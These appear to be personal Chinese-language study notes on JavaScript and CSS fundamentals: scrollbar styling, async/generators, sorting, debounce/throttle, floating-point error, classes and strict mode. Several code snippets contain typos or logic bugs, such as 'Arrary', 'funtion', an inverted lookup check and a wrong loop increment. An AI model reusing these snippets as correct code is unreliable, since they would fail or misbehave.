::-webkit-scrollbar-button — 滚动条上的按钮 (上下箭头). - ::-webkit-scrollbar-thumb — 滚动条上的滚动滑块. - ::-webkit-scrollbar-track — 滚动条轨道. - ::-webkit-scrollbar-track-piece — 滚动条没有滑块的轨道部分. - ::-webkit-scrollbar-corner — 当同时有垂直滚动条和水平滚动条时交汇的部分. - ::-webkit-resizer — 某些元素的corner部分的部分样式(例:textarea的可拖动按钮). ```scss body { // 注意滚动条的宽度,也是包含在元素的offsetWidth里面的 ::-webkit-scrollbar { // 滚动条隐藏,对于长页面来说,有滚动条有提示作用 // 对于明知可滚动的元素,可以隐藏滚动条 // display: none; width: 3px; height: 3px; } ::-webkit-scrollbar-thumb { border-radius: 10px; -webkit-box-shadow: inset 0 0 5px rgba(0,0,0,0.2); background: gold; } ::-webkit-scrollbar-track { -webkit-box-shadow: inset 0 0 1px rgba(0,0,0,0); border-radius: 10px; background: #ccc; } ::-webkit-scrollbar-track-piece { background: #42b983; } /* 注明start,表示不包含结尾处的轨道,当然end就正好相反 */ ::-webkit-scrollbar-track-piece:start { background: #2db7f5; } // 指定具体类 .scroll-xxx::-webkit-scrollbar { width: 10px; height: 10px; } } ``` 注意:有时候不太容易确定滚动条到底属于哪个元素的,因此有时候不太容易去掉指定滚动条或者给指定元素添加自定义滚动条 **移动端滚动页面不顺畅**,在一些ios手机上,有时候滚动列表页时,感觉页面不顺畅(感觉页面时黏在手上似的),设置如下可实现惯性滚动和弹性效果: - auto: 使用普通滚动, 当手指从触摸屏上移开,滚动会立即停止。 - touch: 使用具有回弹效果的滚动, 当手指从触摸屏上移开,内容会继续保持一段时间的滚动效果。继续滚动的速度和持续的时间和滚动手势的强烈程度成正比。 ```css -webkit-overflow-scrolling: touch; ``` ***async、generator、promise*** **异步编程的最高境界,就是不用关心它是不是异步。。。** **一句话,async 函数就是 Generator 函数的语法糖。** ES6 中提出一个叫生成器(Generator)的概念,执行生成器函数,会返回迭代器对象(Iterator),这个迭代器对象可以遍历函数内部的每一个状态。 ```js function* helloWorldGenerator() { yield 'hello'; yield 'world'; return 'ending'; } // 通过执行生成器返回迭代器对象 var helloWorldIterator = helloWorldGenerator(); helloWorldIterator.next(); // { value: "hello", done: false } helloWorldIterator.next(); // { value: "world", done: false } helloWorldIterator.next(); // { value: "ending", done: true } helloWorldIterator.next(); // { value: undefined, done: true } ``` 迭代器对象通过调用next()方法,遍历下一个内部状态。。。 对于一个读取文件的生成器函数,有: ```js var fs = require('fs'); var readFile = function (fileName){ return new Promise(function (resolve, reject){ fs.readFile(fileName, function(error, data){ if (error) reject(error); // 有错误直接抛出 resolve(data); // 否则, }); }); }; var gen = function* (){ var f1 = yield readFile('/etc/fstab'); var f2 = yield readFile('/etc/shells'); console.log(f1.toString()); console.log(f2.toString()); }; ``` 改成async函数,就如下: ```js var asyncReadFile = async function (){ var f1 = await readFile('/etc/fstab'); var f2 = await readFile('/etc/shells'); console.log(f1.toString()); console.log(f2.toString()); }; ``` 一比较就会发现,async 函数就是将 Generator 函数的星号(*)替换成 async,将 yield 替换成 await,仅此而已。 但async函数比generator函数有几点改进: 1. **内置执行器。**,Generator 函数的执行必须靠执行器,所以才有了 co 函数库,而 async 函数自带执行器。也就是说,async 函数的执行,与普通函数一模一样,只要一行。 2. **更好的语义。** async 和 await,比起星号和 yield,语义更清楚了。async 表示函数里有异步操作,await 表示紧跟在后面的表达式需要等待结果。 3. **更广的适用性。** co 函数库约定,yield 命令后面只能是 Thunk 函数或 Promise 对象,而 async 函数的 await 命令后面,可以跟 Promise 对象和原始类型的值(数值、字符串和布尔值,但这时等同于同步操作)。 4. **返回值是 Promise。**async函数的返回值是 Promise 对象,这比 Generator 函数的返回值是 Iterator 对象方便多了。你可以用then方法指定下一步的操作。 进一步说,async函数完全可以看作多个异步操作,包装成的一个 Promise 对象,而await命令就是内部then命令的语法糖。 async 函数的实现原理,就是将 Generator 函数和自动执行器,包装在一个函数里。 ```js async function fn(args) { // ... } // 等同于 function fn(args) { return spawn(function*() { // ... }); } function spawn(genF) { return new Promise(function(resolve, reject) { const gen = genF(); function step(nextF) { let next; try { next = nextF(); } catch (e) { return reject(e); } if (next.done) { return resolve(next.value); } Promise.resolve(next.value).then( function(v) { step(function() { return gen.next(v); }); }, function(e) { step(function() { return gen.throw(e); }); } ); } step(function() { return gen.next(undefined); }); }); } ``` async函数返回一个 Promise 对象,可以使用then方法添加回调函数。当函数执行的时候,一旦遇到await就会先返回,等到异步操作完成,再接着执行函数体内后面的语句。 ```js function timeout(ms) { return new Promise((resolve) => { setTimeout(resolve, ms); }); } async function asyncPrint(value, ms) { await timeout(ms); console.log(value); } asyncPrint('hello world', 5000); ``` 上面代码指定 5000 毫秒以后,输出hello world。 正常情况下,await命令后面是一个 Promise 对象,返回该对象的结果。如果不是 Promise 对象,就直接返回对应的值。 ```js async function f() { // 等同于 // return 123; return await 123; } f().then(v => console.log(v)) ``` 上面正常情况下await后是跟着promise(而这个promise会返回一个对象),但如果不是promise,而是一个常量,则没有返回值,此时需要用`return await`,其实这里还是会用`Promise.resolve()`包装一下,进而形成一个微任务; ***常用算法*** 复杂度:数组长度100,如果循环100次,其时间复杂度就是100,若里面再嵌套一个100数组的for循环,则复杂度就是100*100 = 10000次;若没有嵌套,只是并且的执行两个for循环,则复杂度是100+100 = 200,因此对于大数据情况,少用嵌套。。。 ```js var arr100 = new Arrary(100); var arr1000 = new Arrary(1000); let map = {}; arr100.forEach(item => { map[item.id] = item; item.arr = []; }) arr1000.forEach(item => { if(map[item.id]) return; map[item.id].arr.push(item) }) ``` 另外就是复杂度可分为时间和空间,时间的话可以理解为计算的次数,而空间的话,可以理解为占用的内存空间。一般为了提高性能都是空间换时间,也就是说,可以多占点内存,节省点时间,比如上面两个循环单独执行,而不是嵌套。 ***常用排序*** **冒泡排序:**(依次比较相邻的两数,然后交换位置,依次将最大或最小放到数组最后,每次循环都可减少一轮) 冒泡排序只涉及相邻数据的交换,只需要常量级的临时空间,因此空间复杂度为O(1) 最好的情况是待排序的数据已经是有序的,因此只需要一次冒泡就结束了,时间复杂度为O(n),当然最坏就是正好相反,所以为O(n的平方) ```js function bubleSort(arr) { let arrLen = arr.length if(arrLen <= 1) return arr //必须返回数组 for(let i = 0; i < arrLen - 1; i++){ let flag = true; //加标志位,如果一轮循环内没有一次交换数据,说明已排好序 for(let j = 0; j < arrLen - i -1; j++){ if(arr[j] > arr[j+1]){ [arr[j+1],arr[j]] = [arr[j],arr[j+1]] flag = false } // 还可以这样, // arr[j] > arr[j+1] && ([arr[j+1], arr[j]] = [arr[j], arr[j+1]]) } // 与内层for循环同级 if(flag) break } return arr } ``` 冒泡排序为了更好理解,可以分解为: 1. 先将数组中最大移到最后 ```js // 只需比较arr.length -1次 for(let j = 0; j < arr.length - 1; i++){ if(arr[j] > arr[j+1]){ [arr[j],arr[j+1]] = [arr[j+1],arr[j]] } } ``` 2. 重复多次,将数组中其他依次大的值移到后面 ```js for(let i = 0;i<arr.length-1;i++){ // 务必注意,外层每循环一次,内层就会减少一层遍历,因为最大值不需要再比对了 for(let j = 0;j<arr.length-1-i;j++){ if(arr[j]>arr[j+1]){ [arr[j],arr[j+1]] = [arr[j+1],arr[j]] } } } ``` 3. 如果数组的次序排列一次就好了,还需要再排吗 ```js for(let i = 0;i<arr.length-1;i++){ // 声明变量,假如已经排好序 let flag = true for(let j = 0;j<arr.length-1-i;j++){ if(arr[j]>arr[j+1]){ [arr[j],arr[j+1]] = [arr[j+1],arr[j]] // 如果交换次序,说明排序还没有完成 flag = false } } console.log(1) // 这里可以打印次数,如果已经排好序就不会再继续排序了 // 应该和内层for循环同级 if(flag) break } ``` **选择排序:**类似插入排序,也分为已排序和未排序区间,但是每次会从未排序区间找到最小的元素,将其放到已排序的末尾 ![consultCache](/jsArt/assets/images/math/math-select.jpg) ```js function selectSort(array) { if (Object.prototype.toString.call(array).slice(8, -1) === 'Array') { var len = array.length, temp; for (var i = 0; i < len - 1; i++) { var min = array[i]; for (var j = i + 1; j < len; j++) { if (array[j] < min) { [array[j], min] = [min, array[j]] } } array[i] = min; } return array; } else { return 'array is not an Array!'; } } ``` 选择排序也可以分解为如下: 1. 循环一遍,先找到数组中最小的值,因为后面要操作这个值,所以得记下index ```js // 假设最小值的index let minIdx = 0 // 至于length是否减一,就要根据需求是否要取到最后一个元素了 for(let i = 0; i< arr.length;i++){ if(arr[minIdx] > arr[i]){ // 将最小值的index赋值给minIdx minIdx = i } } ``` 2. 再比较选出来的最小值与假设的最小值 ```js let minIdx = 0 for(let i = 0; i< arr.length;i++){ if(arr[minIdx] > arr[i]){ minIdx = i } } if(arr[0] !== arr[minIdx]){ // 如果不等于,说明最小值不是假设的那个 // 然后交换二者位置,所以要存index [arr[0],arr[minIdx]] = [arr[minIdx],arr[0]] } ``` 3. 假设每次外层循环的开始值是最小 ```js for(let i = 0;i<arr.length;i++){ let minIdx = i for(let j =i+1;j<arr.length;j++){ if(arr[minIdx] < arr[j]){ minIdx = j } } if(arr[i] !== arr[minIdx]){ [arr[i],arr[minIdx]] = [arr[minIdx],arr[i]] } } ``` 插入排序的空间复杂度为O(1),最好、最坏情况时间复杂度都为O(n的平方)。。。再来对比下三者 ![consultCache](/jsArt/assets/images/math/insert-buble-select.jpg) ***常用算法*** ```js // 2、数组去重 // 2.1,利用forEach,将数组的元素取出来作为对象的key,然后赋予任意值,最后获取key列表 var uniqueArr = arr => { let obj = {} arr.forEach((val) => { obj[val] = 0 }) // 注意,返回的是可枚举的字符串数组 return Object.keys(obj) } // 2.2,filter,indexOf只会返回第一个匹配数据的index // 因此即使有多个相同的,也只会返回第一个 var uniqueArr = arr => { // Array.prototype.filter(callback(element[, index[, array]])[, thisArg]) // 注意可选参数的意义;thisArg为执行callback时this值 return arr.filter((ele, index, array) => { return index === array.indexOf(ele) }) } // 2.3,set var uniqueArr = arr => { // 注意只适用于数组为基本数据类型的 return [...new Set(arr)] } // 2.4,reduce // Array.prototype.reduce(callback(accumulator,currentValue[, currentIndex[, array]])[, initialValue]) // accumulator是累计器最终的值,若initialValue没传则默认取数组第一项,currentValue则自动为第二项 // 下面给累加器传的值是一个对象,相当于2.1方法的另外一种方式 var uniqueArr = arr.reduce((map,item) => { map[item] = 0 // 不能在里面直接返回Object.keys(map) // 因为这里返回的map会依然作为下次迭代的初始值 return map; }, {}) Object.keys(uniqueArr) // 3、字符串反转 var reverseString = str => { return [...str].reverse().join('') } // 4、统计一个字符串中出现频率最高的字母或数字 var strChar = str => { let string = [...str], maxVal = '', obj = {}, max = 0; string.forEach( val => { obj[val] = obj[val] === undefined ? 1 : obj[val] + 1 if(obj[val] > max){ max = obj[val] maxVal = val } }) return maxVal } ``` ***常用函数*** ```js // 防抖 // 小于设置的interval时间间隔都不会触发,因为clearTimeout了 // 注意执行clearTimeout后,fn.timerId的值仍然存在,因为这是变量,和队列里的任务没有关系 function debounce(fn, interval = 300) { // 这里返回一个函数,因为绑定事件只是想在事件发生时才会触发 // 因此,如果只保留函数体,防抖依然会生效,只是绑定时会触发一次。 return (...args) => { clearTimeout(fn.timerId) fn.timerId = setTimeout(() => { fn.apply(this, args) },interval) } } function debounce(fn, interval = 300) { return (...args) => { clearTimeout(fn.timerId); fn.timerId = setTimeout(() => { fn.apply(this, args) }, interval) } } window.onresize = debounce(test, 500) window.onresize = debounce(()=>{console.log('resizing')},500) window.addEventListener('resize',debounce(()=>{console.log('resizing')},500)) funtion throttle(fn, interval) { let canRun = true; return (...args) => { if (!canRun) return; canRun = false; setTimeout(() => { fn.apply(this, args); canRun = true; }) } } function throttle(fn, interval) { // let canRun = null // 注意这里canRun不是null let canRun = true; return function (...args) { // !canRun && return // 这样写错误 if(!canRun) return canRun = false; setTimeout(()=>{ fn.apply(this, args); canRun = true; },interval) } } window.onresize = throttle(()=>{console.log('resizing')}) //这里的e就是resize事件,但这里打印的是[object Event],因为``里面是字符串 window.onresize = throttle((e)=>{console.log('resizing',`e is ${e}`)}) // 实现lodash的get方法, // Gets the value at path of object. If the resolved value is undefined, the defaultValue is returned in its place. // _.get(object, path, [defaultValue]) function deepGet ( object, path, defaultValue ) { return ( !Array.isArray( path ) ? path.replace( /\[/g, '.' ).replace( /\]/g, '' ).split( '.' ) : path ) .reduce( (o, k) => ( o || {} )[k], object ) || defaultValue; } var obj = { 'a': [ { 'b': { 'c': 3 } } ] }; var result = deepGet( obj, 'a[0].b.c' ); console.log( result ); // => 3 result=deepGet(obj, ['a', '0', 'b', 'c']); console.log(result); // => 3 result=deepGet(obj, 'a.b.c', 'default'); console.log(result); // => default ``` **0.1+0.2 != .3?**: - 为什么0.1 + 0.2 不等于0.3。因为计算机不能精确表示0.1, 0.2这样的浮点数,计算时使用的是带有舍入误差的数 - 并不是所有的浮点数在计算机内部都存在舍入误差,比如0.5就没有舍入误差 - 具有舍入误差的运算结可能会符合我们的期望,原因可能是“负负得正” - 怎么办?1个办法是使用整型代替浮点数计算;2是不要直接比较两个浮点数,而应该使用bignumber.js这样的浮点数运算库 - 有一个标准IEEE754 在浮点数运算中产生误差值的示例中,最出名应该是0.1 + 0.2 === 0.30000000000000004了,到底有多有名?看看这个网站就知道了http://0.30000000000000004.com/。也就是说不仅是JavaScript会产生这种问题,只要是采用IEEE 754 Floating-point的浮点数编码方式来表示浮点数时,则会产生这类问题。下面我们来分析整个运算过程。 1. 0.1 的二进制表示为 1.1001100110011001100110011001100110011001100110011001 1(0011)+ * 2^-4; 2. 当64bit的存储空间无法存储完整的无限循环小数,而IEEE 754 Floating-point采用round to nearest, tie to even的舍入模式,因此0.1实际存储时的位模式是0-01111111011-1001100110011001100110011001100110011001100110011010; 3. 0.2 的二进制表示为 1.1001100110011001100110011001100110011001100110011001 1(0011)+ * 2^-3; 4. 当64bit的存储空间无法存储完整的无限循环小数,而IEEE 754 Floating-point采用round to nearest, tie to even的舍入模式,因此0.2实际存储时的位模式是0-01111111100-1001100110011001100110011001100110011001100110011010; 5. 实际存储的位模式作为操作数进行浮点数加法,得到 0-01111111101-0011001100110011001100110011001100110011001100110100。转换为十进制即为0.30000000000000004。 总结下来就是:**64bit的存储空间无法存储完整的无限循环小数,因此将舍入后相加就出现** **0.1在计算机内部是如何表示的?** 但是可以通过一些第三方类库解决,或者用原生的方式避免 ```js parseFloat((数学表达式).toFixed(digits)); // toFixed() 精度参数须在 0 与20 之间 // 运行 parseFloat((0.1 + 0.2).toFixed(10))//结果为0.3 parseFloat((0.3 / 0.1).toFixed(10)) // 结果为 3 parseFloat((0.7 * 180).toFixed(10))//结果为126 parseFloat((1.0 - 0.9).toFixed(10)) // 结果为 0.1 parseFloat((9.7 * 100).toFixed(10)) // 结果为 970 parseFloat((2.22 + 0.1).toFixed(10)) // 结果为 2.32 Number(parseFloat((2.22 + 0.1).toFixed(10))) // 结果为2.32数字格式 Number(parseFloat((0.2 + 0.1).toPrecision(1)) // 结果为0.3数字格式,toPrecision(位数)设置精度的 ``` ***函数柯理化*** 参考:[柯理化编程思想][curringProgramTheroyUrl]、[柯理化函数(简书)][curringFunctionUrl] [curringProgramTheroyUrl]:https://www.manster.me/?p=271 [curringFunctionUrl]:https://www.jianshu.com/p/25dcf49e26e6 柯理化函数思想是一种编程思想,体现出JS的预处理机制,预处理什么呢?就是把多参数的函数变成一个接受单一参数的函数。 ```js function add(fn, ...args1) { return (...args2) => { return fn.apply(this, [...args1, ...args2]) } } function sum(...args) { return args.reduce((cur, next) => { return cur += next; }) } console.log(add(sum, 1,2)(3,4)) ``` 其实更多的是预处理this指向的问题,处理this指向问题,JS提供了两个方法call() 和 apply() 方法,两个区别在于后者传参是以数组形式传递进去的,前者是单个传入;共同点就是都是在**改变this指向的同时将方法运行**。 但是有时候并不想让方法立即执行,这个时候使用H5中新增的方法bind() ,bind方法体现出了柯理化函数思想,通俗点就是他可以将函数中的this指向改变但同时不立即运行方法,等需要运行的时候再运行。使用bind,返回改变上下文this后的函数 ***null和undefined*** 参考:[null和undefined的由来及区别][nullAndundefined(阮一峰)] 只所以:typeof null返回"object",因为不同的对象在底层都表示为二进制,在 JavaScript 中二进制前三位都为 0 的话会被判 断为 object 类型,null 的二进制表示是全 0,自然前三位也是 0,所以执行 typeof 时会返回“object”。 null表示"没有对象",即该处不应该有值。undefined表示"缺少值",就是此处应该有一个值,但是还没有定义 ***数组方法*** - forEach(fn)遍历数组, - pop()删除最后一个并返回元素 - shift()删除第一个并返回元素 - unshift()在头部增加一个元素,返回数组长度 - indexOf查找并返回索引(字符串也可以用) - splice(pos, 1)通过索引删除一个元素并返回删除元素组成的数组,省略数量则截取开始到结束的数组并返回,还可以在删除的位置添加元素,改变原数组。负数则反向 - slice([begin[,end]])前包后不包,都省则浅复制 - reverse()反转数组 - toString()返回一个字符串,表示指定的数组及其元素 - Array.from() 方法从一个类似数组或可迭代对象中创建一个新的数组实例 - Array.of() 方法创建一个具有可变数量参数的新数组实例,而不考虑参数的数量或类型 - find() 方法返回数组中满足提供的测试函数的第一个元素的值。否则返回 undefined - arr.flat([depth])方法会递归到指定深度将所有子数组连接,并返回一个新数组。(扁平化嵌套数组) - 可以使用数组的length属性截取数组,清空数组(等0) JavaScript 数组的 length 属性和其数字下标之间有着紧密的联系。数组内置的几个方法(例如 join、slice、indexOf 等)都会考虑 length 的值。另外还有一些方法(例如 push、splice 等)还会改变 length 的值。 **注意:**不要使用delete删除数组的元素,因为使用 delete 只是用 undefined 来替换掉原有的项,并不是真正的从数组中删除。 ```js var items = [12, 548 ,'a' , 2 , 5478 , 'foo' , 8852, , 'Doe' ,2154 , 119 ]; items.length; // return 11 delete items[3]; // return true items.length; // return 11 items.splice(3,1) // [2] items.length; // return 10 ``` map方法: ```js var new_array = arr.map(function callback(currentValue[, index[, array]]) { // Return element for new_array }[, thisArg]) ``` ```js // 编写一个程序将数组扁平化去并除其中重复部分数据,最终得到一个升序且不重复的数组 var arr = [ [1, 2, 2], [3, 4, 5, 5], [6, 7, 8, 9, [11, 12, [12, 13, [14] ] ] ], 10]; // Set的参数可以是数组还可以是伪数组,Infinity是正无穷大,返回不重复数组 // Array.from接受伪数组,返回数组实例,准确来说是伪数组对象或可迭代对象,其实具有length属性即可 // Array.from(arrayLike[, mapFn[, thisArg]]) Array.from(new Set(arr.flat(Infinity))).sort((a,b)=>{ return a-b}) Array.from(10).fill(0).map(() => 1); // 等价于 Array.from({length: 10}, () => 1); // 快速生成序列数组还可以如下 [...Array(10).keys()] // [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] Array(10).map((item,idex) => idex) // 这里只是声明一个长度为10的数组空间,但每个空间并没有值 // [empty × 10] // 如果不能保证数据都是数字或其`valueOf()`没有返回数值类型,用下面 Array.from(new Set(arr.flat(Infinity))).sort((a, b) => { if (a > b) { return 1 } else if (a < b) { return -1 } else { return 0 } }) ``` ***return 语法*** return语句的作用是指定函数返回的值。**return语句只能出现在函数体内,出现在代码中的其他任何地方都会造成语法错误**!用return语句来终止一个函数的执行。如果return后面不返回值,则把值undefined赋给调用当前函数的表达式。 return语句一般用法: 1. 返回函数结果:return a; 2. 阻止默认事件或者阻止往下执行:return false; ```js for(var i=0;i<5;i++){ return 3 } // Uncaught SyntaxError: Illegal return statement function dd(){ for(var i=0;i<4;i++){ if (i === 2) { return 5; } } } // 5 ``` 观察上面代码,一个报错,一个不报错,这是因为一个返回是在循环体,一个是在函数体。return 语句只能出现在函数体中。 ***for in与for of循环区别*** 遍历数组通常使用for循环,es5也可以使用forEach,只是forEach遍历数组无法break(使用会报`Illegal break statement`错误),使用return也无法回到外层函数(只是当前循环return后面的语句不执行了,下一次的循环依然会执行) ```js var arr = [1,2,3,4] arr.forEach(item => { if(item == 2){ break } console.log(item) }) // Uncaught SyntaxError: Illegal break statement arr.forEach(item => { if(item == 2){ return 22 } console.log(item) }) // 1 3 4 ``` `for in`更适合遍历对象,遍历数组会有以下问题: - index索引为字符串数字,不能直接进行几何运算 - 使用for in会遍历数组所有的可枚举属性,包括原型。 - 遍历顺序有可能不是按照实际数组的内部顺序 ```js var arr = [1,2,3,4] arr.test = 'test me' for(item in arr){ // 即可以跳出整个循环 if(item == 2) break // 打印的字符串的key,如果有属性,也会将属性的key打印出来 console.log(item, typeof(item)) } // 0 string // 1 string // 定义数组后,还可以用 Object.defineProperty(arr,'newKey',{ value : 'this is newKew value', enumerable : true //可枚举,默认false }) // 此时数组为 [1, 2, 3, 4, newKey: "this is newKew value"] ``` **注意:**因为数组用for in循环其实打印的是索引,索引的话肯定是有顺序的,因此针对第三条并准确 但是如果用for in遍历对象的话,因为Chrome、 sarari、 firebox、 Opera 中使用 for-in 语句遍历对象属性时会遵循一个规律,**它们会先提取所有 key 的 parseFloat 值为非负整数的属性, 然后根据数字顺序对属性排序首先遍历出来,然后按照对象定义的顺序遍历余下的所有属性。** ```js var arr = {b:'bb' ,a:'aa' ,"3":33 ,'1':11} for(var item in arr){console.log(item)} // 1 // 3 // b // a ``` **注意:**从以上代码可以看出,经过parseFloat转化后的非负整数3和1,排序就变成了1,3。。。但b和a的顺序还是没有改变 综上如果想遍历**数组又想按顺序**的话,可以用`for of`来执行 ```js var arr1 = [ '2', '1', 'b', 'a'] for(var item of arr1) console.log(item) // 2 1 b a var arr1 = [ '2', '1', 'b', 'a'] for(var item of arr1) { if (item === '1') { // 或者break return; } console.log(item) } // 2 ``` `for...of`语句在可迭代对象(包括 Array,Map,Set,String,TypedArray,arguments 对象等等)上创建一个迭代循环,调用自定义迭代钩子,并为每个不同属性的值执行语句。。。因此对于可迭代的对象,都能用`来执行`,而普通的{}对象不可以,会报错`xxx is not iterable` ***基于对象与OOP(面向对象)*** 面向对象编程是一种基于以下思路的程序设计方法:将关注点置于 对象(Object)本身,**对象的构成要素包含对象的行为及操作B,以此为 基础进行编程**。这种方法使程序易于复用,软件的生产效率因而得以 提升。其中所使用的主要编程技巧有继承、封装、多态三种。继承指的是通过继承已存在的类所拥有的成员而生成新的类。封 装指的是在类所拥有的成员中,隐藏掉那些没有必要展现给该类调用 者的成员。多态指的是针对同一种消息,不同的对象可以进行不同的 操作。 在面向对象编程中,使用了一种称为“类”的要素,通过把若干个 类组装到一起构建一个完整的程序。从这一点来看,可以说类就是程 序的组件(Component)。面向对象编程的关键在于能否灵活地运用类。类是对象的定义,而对象是 类的实例(Instance)。 在使用古老的 C 语言或 BASIC 等语言编程时(它们不是面向对象 的编程语言,即不是用于表达面向对象编程思想的语言),用“函数” 表示指令,用“变量”表示数据。对于 C 语言或是 BASIC 的程序员而 言,程序就是函数和数据的集合。 Java 和 .NET 其实是位于操作系统(Windows 或 Linux 等)之上,旨在通过隐藏操作系统的复杂性从而提升开发效率的 程序集,**这样的程序集也被称作“框架”(Framework)。框架由两部分构成,一部分是负责安全执行程序的“执行引擎”,另一部分是作为程 序组件集合的“类库”**。 ![java框架图示](/jsArt/assets/images/js-theory/java-frame.png) 无论是使用 Java 还是 .NET,都需要依赖类库进行面向对象编程。 在 Java 中,使用的是与框架同名的 Java 语言。而在 .NET 中,使用的 是 .NET 框 架 支 持 的 C#、Visual Basic.NET、Visual C++、NetCOBOL 等语言进行开发。 js的核心是支持面向对象,但准确来说是基于对象 >oop(object oriented programming)面向对象编程是用抽象方式创建基于现实世界模型的一种编程方式。 基于对象,就是一个工程师建了一栋房子,然后其它的工程师按照这个房子的样子去建造其它的房子 面向对象,就是一个工程师再图纸上设计出一栋房子的样子,然后其它工程师按照这个图纸的设计去建造房子 也就是说: 基于对象是先有一个具体的对象,然后在这个对象的基础上创建新的对象 面向对象就是先有一个抽象的对象描述,然后以此为蓝本构建具体对象 一般的面向对象语言中的类的概念 都是 一个 抽象的声明,当 new 出来一个对象的时候,就是依据 类的声明给造出来的,就像是模子里面刻出来的。 javascript是基于对象的,那么它所有的对象都是从原型对象继承而来,和原型模式大概相似,Javascript的动态特性,可以随时的给对象的原型添加方法或属性,然后new出来的对象就有了。 但作为es6的class,其实并不能说是面向对象,可以将class看成一个语法糖,新的class写法只是让对象原型的写法更加清晰,**更像面向对象编程的语法**而已,如下: ```js // 构造函数 function Point (x) { this.x = x } // 给原型添加属性 Point.prototype.toString = function () { return `this.x is ${this.x}` } // class写法 class Point { // 构造函数 constructor (x) { this.x = x } // 直接添加方法 toString () { return `this.x is ${this.x}` } } // 实例化 var newPoint = new Point('test') newPoint.toString() // this.x is test // super关键字是用于访问和调用一个对象的父对象上的函数 // class实现继承是通过 extends class colorPoint extends Point { constructor (x, color) { super(x) this.color = color } toString () { return `this.color is ${this.color} & ${super.toString()}` } } ``` **严格模式('use strict')** 严格模式不仅仅是一个子集,它的产生是为了形成与正常代码不同的语义。常见的规则如下 - 未声明而直接被赋值的情况将报错 - 八进制012模式将不会允许,新模式为拼接'0o',即0o12 - 对象中的属性名必须唯一 - 函数的参数名必须唯一 - 禁止删除已声明的变量 - arguments对象只会保存函数被调用时的原始参数,且再修改无效 - 不再支持arguments.callee(非严格模式下,指向正在执行的函数) - 通过this传递给一个函数的值不会被强制转换为一个对象 我们应该知道,在非严格模式下,对于普通的函数来说,this总会是一个对象。。。不管调用函数时,this它本来就是一个对象,还是用布尔值,字符串或者数字等,调用函数时,函数里面this都会被封装成对象;即使使用undefined或者null调用函数时,this代表的全局对象(使用call, apply或者bind方法来指定一个确定的this)。这种**自动转化为对象的过程不仅是一种性能上的损耗**,同时在浏览器中暴露出全局对象也会成为安全隐患,因为全局对象提供了访问那些所谓安全的JavaScript环境必须限制的功能的途径。所以对于一个开启严格模式的函数,指定的this不再被封装为对象,而且**如果没有指定this的话它值是undefined,但是如果你指定null,undefined,true则this分别是null,undefined,Boolean** ```js 'use strict' function getValType(val){ return Object.prototype.toString.call(val).slice(8,-1) } function my(){ return this } console.log(my() === window) // false console.log(my() === undefined) // true console.log(getValType(my.call(1))) // Number console.log(getValType(my.apply(null))) // Null console.log(getValType(my.apply(undefined))) // Undefined console.log(getValType(my.bind(true)())) // Boolean // 非严格模式 console.log(my() === window) // true console.log(my() === undefined) // false console.log(getValType(my.call(1))) // Number console.log(getValType(my.apply(null))) // Window console.log(getValType(my.apply(undefined))) // Window console.log(getValType(my.bind(true)())) // Boolean ``` 另外严格模式下,一部分字符变为保留的关键字,这些字符包括implements, interface, let, package, private, protected, public, static和yield等 **es6引入的class类实质上是js现有的基于原型继承的语法糖,类语法不会为js引入新的面向对象的继承模型**。。。 类的定义有两种方式 ```js // 方式一:类声明 class Rectangle { constructor(height, width) { this.height = height; this.width = width; } } // 方式二:类表达式(匿名类,命名类) /* 匿名类 */ let Rectangle = class { constructor(height, width) { // ... } }; /* 命名的类 */ let Rectangle = class Rectangle { constructor(height, width) { // ... } }; ``` **务必注意:**类class没有变量提升;类声明和类表达式的主体(其实就是定义类的具体的内容)都执行在严格模式下,比如构造函数,静态方法,原型方法,getter和setter都在严格模式下执行,也就意味着,**this在严格模式下并不会自动被包装成对象**。。。根据默认绑定this规则,此时this会绑定到undefined上,因此为了防止这样,需要用下面的super方法。 **务必注意:**在使用**extends扩展子类时,子类如果有constructor,则必须先调用super方法**,否则新建实例时会报错。这是因为子类自己的this对象,必须先通过父类的构造函数完成塑造,得到与父类同样的实例属性和方法,然后再对其进行加工,加上子类自己的实例属性和方法。如果不调用super方法,子类就得不到this对象。 1. super([arguments]) // 调用父类或父对象的构造函数,参数作为构造函数的参数传入,而且只能在子类的构造函数里调用 2. super.functionOnParent([arguments]) // 指定父类或父对象上的方法并调用,可以在子类的任何地方调用 ***高阶函数:*** 在js中,函数可以指向某个变量,同时函数的参数可以接受变量,难么一个函数就可以接受另一个函数作为参数,这种函数就叫高阶函数, ***沙箱、闭包*** 从语言学的角度上来说,允许代码无节制地使用全局变量,是最错误的选择之一。而更可怕的,就是一个变量"可能"成为全局的(在未知的时间与地点)。但是这两项,却伴随JavaScript这门语言成功地走到了现在。 也许是限于浏览器应用的规模,所以这一切还迟迟没有酿成灾难。在此之前,出现了两种解决方案。一种是ECMA在新的规范(Edition 5)中对此做出了限制,其中最重要的一条便是eval()的使用变得不再随意和无度。而另一种方案,则是相对没有那么官僚与学术的,尽管也拥有一个同样学术的名字:沙箱。 沙箱(Sandbox)并不是一个新东西,即使对于JavaScript来说,也已经存在了相当长的时间。**在SpiderMonkey(第一款JavaScript引擎) JS的源代码中,就明确地将一个闭包描述为一个沙箱**。这包含着许多潜在的信息:它有一个初始环境,可以被重置,可以被复制,以及最重要的,在它内部的所有操作,不会影响到外部。 当然事实上远非如此。JavaScript里的闭包只是一个"貌似沙箱"的东西--仍然是出于JavaScript早期的语言规范的问题,闭包不得不允许那些"合法泄漏"给外部的东西。 Sandbox中文沙箱或沙盘,Sandbox是一种虚拟的程序运行环境,用以隔离可疑软件中的病毒或者对计算机有害的行为。比如浏览器就是一个Sandbox环境,它加载并执行远程的代码,但对其加以诸多限制,比如禁止跨域请求、不允许读写本地文件等等。这个概念也会被引用至模块化开发的设计中,让各个模块能相对独立地拥有自己的执行环境而不互相干扰。 第一种比较传统的实现模块化的方式便是Namespacing。 ```js var myApp = {}; myApp.module1 = function(){}; ``` 通过前缀式的名称解析可以达到调用不同的模块,并且不同的模块变量环境被封装到了对应的全局变量属性中。然而这并不是真正意义上的Sandbox,这样的做法最终仍然需要暴露出一个全局变量(即myApp),这对所有的模块是透明的,埋下了全局环境被污染的隐患。 那么有没有别的方法可以将变量的作用域隔离开呢? 众所周知,**JavaScript变量的作用域是函数体**,因此,利用**函数体将执行环境包裹起来便成了实现Sandbox**的一种可行方案,当然最好的方式还是iframe... 具体参考:[js的沙箱内容(掘金)][JavaScriptSandboxUrl]、[漫谈沙箱][justTalkSandboxUrl] MDN 